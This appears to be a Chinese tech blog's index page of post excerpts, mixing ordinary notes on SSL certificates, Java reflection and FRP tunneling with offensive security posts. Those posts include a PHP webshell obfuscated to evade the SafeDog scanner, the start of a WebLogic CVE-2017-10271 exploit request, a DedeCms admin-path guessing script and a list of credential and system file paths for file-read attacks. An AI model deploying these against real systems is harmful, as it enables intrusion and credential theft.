Web安全日志分析浅谈


阅读全文>>

使用Let's Encrypt 证书进行SSL加密

最近Google Chrome浏览器有大动作,所有没有https的都标识为不安全,作为有轻微心理洁癖的人,这个不能忍,遂,折腾之! 要为网站部署SSL首先需要证书,而证书由CA机构签发,而基本所有的CA机构签发证书是需要收费的,这就不利于HTTPS协议的推动了。 Let's Encrypt 也是一个CA机构,但是他们是免费的,Let's Encrypt是一个非盈利性组织,他们为了控制成本设计了一个ACME协议,协议中规范了证书申请、更新、撤销等流程,只要一个客户端实现了该协议的功能,通过客户端就可以很方面的向Let’s Encrypt申请证书,任何人都可以...

阅读全文>>

ClassUtils调用引发的几处Bug解决过程记录

前言: 由于Java不像其他语言具有天生的自带的动态特性,为了满足AOP开发模式,我们需要大量用到反射技术,而反射则先需要找到对应的类,这里记录一下在使用ClassUtils进行扫包的时候遇到的问题 最近因为工作需要,需要对原Storm数据处理流程进行重构,将其更换为Spark计算框架,并需要考虑其通用性、拓展性以及开发简易程度,于是着手在原有的基础上进行更改。由于本身接触过POC框架、Spring框架、AOP编程、反射调用、Logstash等技术思路。 所以借鉴这些优秀的框架或技术,基本实现了一个用于Spark集群中的数据处理框架。 由于此项目需要多人协作开发,且解析器需...

阅读全文>>

Php Webshell ByPass SafeDog

记录一些php webshell代码 最新版安全狗扫描结果: 下面是代码,代码顺序为图中顺序: <?php $arr = array('a','s','s','e','r','t'); $func = ''; for($i=0;$i<count($arr);$i++) { $func .= $func . $arr[$i]; } $func($_REQUEST['c']); ?> <?php    @$_++;  $__=("#...

阅读全文>>

Github下载单个文件或文件夹Tips

最近学习Storm,于是从Github下载https://github.com/alibaba/jstorm 由于环境已经通过其他方式部署完成,所以并不需要完整的项目,只需要下载单个文件或者文件夹,这个时候使用git就比较麻烦了。 另外github听说不支持git clone某个文件或者文件夹,为的是保证project的完整性 ,而使用SVN就没问题了 方法如下:  首先找到项目中需要下载的文件夹,如:https://github.com/alibaba/jstorm/tree/master/example 将tree/...

阅读全文>>

FRP内网穿透笔记

有时需要临时将本地的服务提供到外部进行访问,一般情况下我们的做法有两种 1.路由器设置端口映射将本地服务映射到公网某个端口 2.在公网服务器上搭建相关服务 前者需要路由权限,且路由映射的的数量有上限,而后者需要重新进行搭建环境,如果vps配置较低可能无法搭建所有服务,而使用内网穿透工具仅需要一台低配置的vps即可 1.具有公网IP的vps(推荐vultr\banwagon\阿里云,性价比比较高) 2.FRP工具 登陆服务器并下载对应版本 Github地址 https://github.com/f...

阅读全文>>

大数据技能点

                路漫漫其修远兮,吾将上下而求索             一、大数据通用处理平台         1、Spark      ...

阅读全文>>

Weblogic WLS组件漏洞POC

漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 http://0.0.0.0:7071/wls-wsat/CoordinatorPortType <soapenv:Envelope xmlns:soapenv="http://schemas.xmls...

阅读全文>>

DedeCms后台猜解

网上流传的一个找后台的姿势,记录一下: <?php $domain='http://localhost/dedecms/'; $url=$domain.'/index.php'; function post($url, $data, $cookie = '') { $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => true, CURLOPT_POST => true, CURLOPT_SSL_V...

阅读全文>>

任意文件读取常见利用路径

C:/boot.ini //查看系统版本 C:/WindowsSystem32inetsrvMetaBase.xml //IIS配置文件 C:/Windowsrepairsam //存储系统初次安装的密码 C:/Program Filesmysqlmy.ini //Mysql配置 C:/Program Filesmysqldatamysqluser.MYD //Mysql root C:/Windowsphp.ini //php配置信息 C:/Windowsmy.ini //Mysql配置信息C:Windowswin.ini //Windows系统的一个基本系统配置文件 Li...

阅读全文>>